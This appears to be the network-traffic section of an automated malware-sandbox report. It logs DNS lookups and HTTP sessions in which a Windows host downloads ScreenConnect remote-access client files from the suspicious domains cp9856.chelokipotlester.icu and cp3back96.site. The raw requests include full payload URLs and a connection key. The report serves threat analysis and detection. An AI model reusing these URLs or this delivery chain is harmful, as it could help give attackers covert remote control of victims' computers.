                                                                                                                                                                              Oct 29, 2024 19:35:04.262537956 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.262537956 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.262567043 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.262614965 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.263472080 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.263489008 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.263549089 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.263562918 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.264466047 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.264970064 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.264990091 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.270459890 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.270486116 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.274441957 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.379528046 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.379554033 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.380693913 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.380748034 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.380800962 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.380801916 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.380825996 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.381906986 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.413013935 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.413031101 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.413181067 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.413204908 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.413650990 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.413676977 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.413716078 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.413727999 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.413784981 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.413784981 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.414132118 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.414171934 CET4434973137.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.414244890 CET49731443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.430458069 CET49733443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.430506945 CET4434973337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:04.430577993 CET49733443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.430910110 CET49733443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:04.430922031 CET4434973337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:05.334933043 CET4434973337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:05.335119009 CET49733443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:05.337194920 CET49733443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:05.337204933 CET4434973337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:05.337434053 CET4434973337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:05.338627100 CET49733443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:35:05.379332066 CET4434973337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:05.767553091 CET4434973337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:05.767618895 CET4434973337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:46.585716963 CET44349739204.79.197.222192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:46.585758924 CET49739443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:46.585783958 CET49739443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:46.589005947 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:46.699353933 CET44349739204.79.197.222192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:46.699469090 CET49739443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:46.699532986 CET44349739204.79.197.222192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:46.699588060 CET49739443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:46.700066090 CET44349739204.79.197.222192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:46.700129986 CET49739443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:46.700143099 CET44349739204.79.197.222192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:46.700159073 CET44349739204.79.197.222192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:46.700165033 CET49739443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:46.700174093 CET44349739204.79.197.222192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:46.700229883 CET49739443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:46.700244904 CET49739443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:46.700257063 CET49739443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:47.801986933 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:48.721563101 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:48.721615076 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:48.721694946 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:48.722079992 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:48.722095013 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.458282948 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.458384991 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.461898088 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.461910963 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.462064028 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.462071896 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.462178946 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.462918997 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.588011980 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.588083029 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.588113070 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.588160038 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.588644981 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.588705063 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.588716984 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.588742971 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.588749886 CET4434974013.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.588784933 CET49740443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.590967894 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.591021061 CET4434974113.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:49.591103077 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.591324091 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:49.591337919 CET4434974113.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.206993103 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:50.347090006 CET4434974113.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.347170115 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.347731113 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.347740889 CET4434974113.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.347970963 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.347975016 CET4434974113.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.480155945 CET4434974113.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.480272055 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.480297089 CET4434974113.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.480349064 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.480916023 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.480986118 CET4434974113.107.4.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.481049061 CET49741443192.168.2.1613.107.4.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.494342089 CET49742443192.168.2.1613.107.219.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.494385958 CET4434974213.107.219.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.494455099 CET49742443192.168.2.1613.107.219.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.494890928 CET49742443192.168.2.1613.107.219.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.494903088 CET4434974213.107.219.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.691487074 CET49743443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:50.691540003 CET44349743204.79.197.200192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.691667080 CET49743443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:50.691900015 CET49743443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:50.691917896 CET44349743204.79.197.200192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:51.023071051 CET49675443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:51.023971081 CET49677443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:51.038132906 CET49674443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:51.272423983 CET4434974213.107.219.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:51.272595882 CET49742443192.168.2.1613.107.219.254
                                                                                                                                                                              Oct 29, 2024 19:35:51.449004889 CET44349743204.79.197.200192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:51.449134111 CET49743443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:55.007014990 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:56.005172014 CET4434974213.107.219.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:56.005287886 CET49742443192.168.2.1613.107.219.254
                                                                                                                                                                              Oct 29, 2024 19:36:00.638035059 CET49675443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:36:00.638048887 CET49677443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:36:00.653992891 CET49674443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:36:04.611267090 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:36:08.922319889 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:08.922380924 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:08.922585964 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:08.922874928 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:08.922889948 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.779602051 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.781260014 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:09.781291962 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.781713963 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.782191992 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:09.782274961 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.833048105 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Oct 29, 2024 19:34:03.982491970 CET53534871.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:04.009872913 CET53520951.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:04.892595053 CET4948553192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:04.892791033 CET6037653192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:04.904831886 CET53494851.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:04.908642054 CET53603761.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:05.255362034 CET53644471.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:08.812669039 CET5074553192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:08.812942982 CET5338053192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:08.821614981 CET53507451.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:08.822904110 CET53533801.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:22.169850111 CET53627931.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:30.126998901 CET5284953192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:30.142971992 CET53528491.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:41.236195087 CET53513691.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:03.916229963 CET53506551.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:03.935486078 CET53573851.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:10.496572971 CET138138192.168.2.16192.168.2.255
                                                                                                                                                                              Oct 29, 2024 19:35:23.151359081 CET6343453192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:35:23.627223015 CET53634341.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:32.984000921 CET53511651.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:48.056770086 CET5445153192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:35:48.563746929 CET53544511.1.1.1192.168.2.16
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 29, 2024 19:34:04.892595053 CET | 192.168.2.16 | 1.1.1.1 | 0x99ea | Standard query (0) | cp9856.chelokipotlester.icu | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:34:04.892791033 CET | 192.168.2.16 | 1.1.1.1 | 0xd64f | Standard query (0) | cp9856.chelokipotlester.icu | 65 | IN (0x0001) | false
Oct 29, 2024 19:34:08.812669039 CET | 192.168.2.16 | 1.1.1.1 | 0x80dc | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:34:08.812942982 CET | 192.168.2.16 | 1.1.1.1 | 0x1e1e | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Oct 29, 2024 19:34:30.126998901 CET | 192.168.2.16 | 1.1.1.1 | 0xfa79 | Standard query (0) | cp9856.chelokipotlester.icu | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:35:23.151359081 CET | 192.168.2.16 | 1.1.1.1 | 0x285c | Standard query (0) | cp3back96.site | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:35:48.056770086 CET | 192.168.2.16 | 1.1.1.1 | 0x596c | Standard query (0) | cp3back96.site | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 29, 2024 19:34:04.904831886 CET | 1.1.1.1 | 192.168.2.16 | 0x99ea | No error (0) | cp9856.chelokipotlester.icu | | 37.221.67.19 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:34:08.821614981 CET | 1.1.1.1 | 192.168.2.16 | 0x80dc | No error (0) | www.google.com | | 142.250.185.228 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:34:08.822904110 CET | 1.1.1.1 | 192.168.2.16 | 0x1e1e | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Oct 29, 2024 19:34:30.142971992 CET | 1.1.1.1 | 192.168.2.16 | 0xfa79 | No error (0) | cp9856.chelokipotlester.icu | | 37.221.67.19 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:34:34.450767040 CET | 1.1.1.1 | 192.168.2.16 | 0x7589 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 29, 2024 19:34:34.450767040 CET | 1.1.1.1 | 192.168.2.16 | 0x7589 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:34:35.303067923 CET | 1.1.1.1 | 192.168.2.16 | 0xfc73 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:34:35.303067923 CET | 1.1.1.1 | 192.168.2.16 | 0xfc73 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:34:36.527394056 CET | 1.1.1.1 | 192.168.2.16 | 0x4958 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 29, 2024 19:34:36.527394056 CET | 1.1.1.1 | 192.168.2.16 | 0x4958 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:34:56.332201004 CET | 1.1.1.1 | 192.168.2.16 | 0x12a5 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 29, 2024 19:34:56.332201004 CET | 1.1.1.1 | 192.168.2.16 | 0x12a5 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:35:17.335035086 CET | 1.1.1.1 | 192.168.2.16 | 0x94b9 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 29, 2024 19:35:17.335035086 CET | 1.1.1.1 | 192.168.2.16 | 0x94b9 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:35:23.627223015 CET | 1.1.1.1 | 192.168.2.16 | 0x285c | No error (0) | cp3back96.site | | 37.221.67.19 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 19:35:48.563746929 CET | 1.1.1.1 | 192.168.2.16 | 0x596c | No error (0) | cp3back96.site | | 37.221.67.19 | A (IP address) | IN (0x0001) | false
• cp9856.chelokipotlester.icu
• slscr.update.microsoft.com
• https:
  • www.bing.com
  • fp.msedge.net
  • c-ring.msedge.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.16 | 49705 | 37.221.67.19 | 443 | 6960 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 18:34:06 UTC | 1184 | OUT | GET /Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r= HTTP/1.1
Host: cp9856.chelokipotlester.icu
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-10-29 18:34:06 UTC | 328 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86304
Content-Type: application/octet-stream
Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
Content-Disposition: inline; filename="support.Client.exe"; filename*=UTF-8''support.Client.exe
Date: Tue, 29 Oct 2024 18:34:06 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.16 | 49713 | 20.109.210.53 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-10-29 18:34:14 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-10-29 18:34:14 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
MS-CorrelationId: 219e1793-07b0-4419-952b-4e0645eeb4aa
MS-RequestId: 228da4e5-39a4-4e5a-a6dd-ee960492f817
MS-CV: ZFgW3pTJx06YK5Ye.0
X-Microsoft-SLSClientCache: 2880
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Tue, 29 Oct 2024 18:34:13 GMT
Connection: close
Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.16 | 49715 | 37.221.67.19 | 443 | 7692 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 18:34:31 UTC | 628 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session HTTP/1.1
Host: cp9856.chelokipotlester.icu
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-29 18:34:31 UTC | 251 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 144124
Content-Type: application/x-ms-application; charset=utf-8
Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
Date: Tue, 29 Oct 2024 18:34:31 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.16 | 49716 | 37.221.67.194 | 443 | 7692 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 18:34:33 UTC | 109 | OUT | GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: cp9856.chelokipotlester.icu
Accept-Encoding: gzip
2024-10-29 18:34:34 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17866
Content-Type: text/html
Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
Date: Tue, 29 Oct 2024 18:34:33 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.16 | 49721 | 37.221.67.194 | 443 | 7692 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 18:34:42 UTC | 135 | OUT | GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: cp9856.chelokipotlester.icu
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-29 18:34:42 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95520
Content-Type: text/html
Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
Date: Tue, 29 Oct 2024 18:34:42 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.16 | 49722 | 37.221.67.194 | 443 | 7692 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 18:34:44 UTC | 143 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
Host: cp9856.chelokipotlester.icu
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-29 18:34:44 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61216
Content-Type: text/html
Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
Date: Tue, 29 Oct 2024 18:34:44 GMT
Connection: close


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.16  49723        37.221.67.19    443               7692  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 18:34:45 UTC  123                OUT        GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                       Host: cp9856.chelokipotlester.icu
